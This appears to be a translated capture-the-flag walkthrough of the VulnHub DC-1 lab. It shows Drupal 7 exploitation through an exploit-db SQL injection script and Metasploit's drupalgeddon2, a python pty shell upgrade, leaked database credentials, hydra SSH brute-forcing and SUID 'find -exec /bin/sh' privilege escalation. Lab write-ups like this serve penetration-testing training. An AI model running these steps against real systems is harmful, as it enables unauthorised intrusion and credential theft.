Download link: https://www.vulnhub.com/entry/dc-1-1,292/
Host discovery nmap -sn 192.168.44.0/24
(Because the DC target machine uses NAT mode, and my NAT mode is the 192.168.44.0 network segment, so I only need to scan the newly added surviving hosts on the 192.168.44.0 network segment, which must be the target machine)
After finding the IP address of the target machine, start a port scan and find that port 22 80 111 is opened
Visited port 80 and found that it was Drupal cms, one of the three major PHP CMS (drupal joomal wordpress), but I don’t know the specific version
When scanning the port with nmap before, the -A parameter was used, so the robots.txt file was found in the website, and the robots.txt file scanned in nmap was accessed.
Found in UPGRADE.txt that the drupal version is 7.x
Use searchsploit in kali to search for vulnerabilities in drupal 7
Use /usr/share/exploitdb/exploits/php/webapps/34992.py this SQL injection vulnerability to add the admin user
View usage
Use /usr/share/exploitdb/exploits/php/webapps/34992.py
/usr/share/exploitdb/exploits/php/webapps/34992.py -t website url -u user name with administrator rights added -p user password
From the above, you can see that the Administrator user is created successfully
Log in to the background, click on the background, and find flag3
I found a file to upload in the background, and the liver did not come down for a long time.
Change the idea, use msf to check if there is an available exp
time:
msfconsole start msf
search drupal search exp
use exploit/unix/webapp/drupal_drupalgeddon2 use the exp
Configure the exp and run
Get the shell, find flag1
cat flag1.txt read flag1
Get tips: Every good CMS needs a configuration file, and this is also
Search for the location of the configuration file
cat settings.php read the configuration file and found flag2 and database user and password
Flag2 tip: Brute force cracking and dictionary attacks are not the only ways to gain access rights (you need to get access rights), if you use these authentications.
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
According to the database user and password, I tried to log in to the MySQL database, and found that the msf shell could not execute the command to log in to the database
Get shell
Use the obtained shell to log in to the database, but still cannot log in to the database without an echo
Only to improve the obtained shell and find that there is a python environment on the target machine, you can write a shell for him with python
python -c 'import pty;pty.spawn("/bin/sh")'
Reference: The previous article: https://blog.csdn.net/qq_32393893/article/details/105487795 Complete this shell to
complete the shell, after the response is displayed, successfully log in to the MySQL database
The administrator shy account created at the beginning of the previous article was found in the users table, and flag 3 was obtained.
Flipping through the database, nothing else was found
The user flag4 was found in the /etc/passwd file
Use hydra to blast the password of flag4 and learn that it opens port 22. The dictionary I use here is john's dictionary and the path is /usr/share/john/password.list
Log in successfully, find the flag4.txt file, get flag4
According to the prompt, the flag is under root, try to escalate the suid privilege, and find the suid executable file running on the system
Find execution is found, try to find privilege
touch shy
find shy -exec whoami \;
find shy -exec /bin/sh \;
cd /root
cat thefinalflag.txt